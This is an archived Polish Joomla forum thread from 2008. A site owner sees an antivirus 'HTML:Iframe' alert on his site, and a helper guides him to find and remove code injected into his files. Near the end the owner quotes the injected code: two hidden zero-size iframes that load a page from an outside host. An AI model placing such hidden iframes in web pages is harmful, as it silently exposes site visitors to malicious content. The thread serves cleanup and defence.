PDA

Zobacz pełną wersję : Iframe



pieniak
21-02-2008, 18:34
Witam

Przy próbie otwarcia strony www.agroportal.net.pl (http://www.agroportal.net.pl) mam alert programu Avast o znalezionym na stronie wirusie:

http://www.agroportal.net.pl/\unp163045961 (http://www.agroportal.net.pl/%5Cunp163045961)
Nazwa pasożyta: HTML:Iframe

Czym to może być spowodowane? Nic nie zmieniałem i nie wgrywałem żadnych
plików na serwer?


Wersja MySQL:: 4.1.22-log
Wersja PHP:: 4.4.7
Serwer WWW:: Apache
Interfejs serwera PHP:: apache2handler
Wersja Joomla!: Joomla! 1.0.8 Stable [ Sunshade ] 26-Feb-2006 05:00 UTC
Przeglądarka:: Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
Istotne ustawienia PHP::
Safe Mode [Tryb bezpieczny]:: OFF (wyłączone)
Open basedir [Katalog bazowy]:: /www/default/www:/www/agroportal_www:/tmp:/usr/local/lib/php
Display Errors (Pokaż błędy):: OFF (wyłączone)
Short Open Tags [Krótkie znaczniki]:: ON (włączone)
File Uploads [Wczytywanie plików]:: ON (włączone)
Magic Quotes [Magiczne sekwencje sterujące]:: ON (włączone)
Register Globals [Rejestruj globalne zmienne]:: OFF (wyłączone)
Output Buffering [Buforuj dane wyjściowe]:: OFF (wyłączone)
Session save path [Ścieżka zapisu sesji]:: /tmp
Session auto start [Automatyczny start sesji]:: 0
Obsługa XML:: Tak
Obsługa Zlib:: Tak
Wyłączone funkcje:: system exec shell_exec passthru popen dl proc_open posix_uname
Edytor WYSIWYG:: Bez edytora WYSIWYG Pozdrawiam

inkos
21-02-2008, 18:40
Czym to może być spowodowane? Nic nie zmieniałem i nie wgrywałem żadnych plików na serwer?

EDIT:
Jednak jest coś w kodzie usuń ze strony wszystko od początku aż do znacznika <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"... .

Natomiast jeśli chodzi o rozwiazanie problemu - przeczytaj wątki zawarte w tym dziale "Sprawy bezpieczeństwa Joomla" dotyczące trojanów.

pieniak
21-02-2008, 18:43
Niestety problem jest od wczoraj, a że używam Avasta to jak na razie tylko jego dotyczy - na innych nie testowałem.

Alert pojawia się po wejściu na dowolną stronę serwisu nie tylko na główną. W IQ.pl twierdzą że to wina dziurawego PHP.

Pozdrawiam

pieniak
21-02-2008, 18:47
EDIT:
Jednak jest coś w kodzie usuń ze strony wszystko od początku aż do znacznika <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"... .


A w którym pliku lub plikach ???

Z góry dziękuję

inkos
21-02-2008, 18:51
W IQ.pl twierdzą że to wina dziurawego PHP.

Przepraszam za zamieszanie. Tradycyjne takie wstawki są umieszczane na końcu plików u Ciebie natomiast pojawił się na samym początku stąd też w pierwszej wersji posta to moje pytanie.

W tej chwili usuń te wszystkie znaczniki <iframe... </iframe> z początku kodu w pliku index.php umieszczonego w katalogu templates/twoj szablon/index.php a także sprawdź czy inne pliki index umieszczone w podfolderach joomla też nie mają takiego kodu na początku. W szczeólności te w katalogu administrator i innych które są podkatalogami w stosunku do głównego katalogu Joomla.

Przeczytaj także ten wątek (http://forum.joomla.pl/showthread.php?t=9400&page=2). Jest tam opisane jak uniknąć takich problemów w przyszłości.

Co do uwagi o php to źle świadczy o tej firmie. Owszem php nie jest doskonałe ale firma która zamiast aktualizować oprogramowanie swoich serwerów odpowiada w ten sposób na pytania użytkownika sama prosi się o rezygnację z jej usług dla dobra Twojego serwisu.

pieniak
21-02-2008, 18:55
W tym pliku nie ma ani jednego takiego znacznika <iframe... </iframe> niestety ???

inkos
21-02-2008, 19:02
W tym pliku nie ma ani jednego takiego znacznika <iframe... </iframe> niestety ???
A czy w plikach które masz w głównym katalogu Joomla nie ma takich znaczników zaczynajacych się od <IFRAME src="tutaj jest adres strony " width="0" height="0" frameborder="0"></iframe>. Sprawdź.

pieniak
21-02-2008, 19:10
Znalazłem. Powodem jest kod


<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>Dodany na końcu niektórych plików na serwerze. Właśnie go usuwam.

Dziękuję za pomoc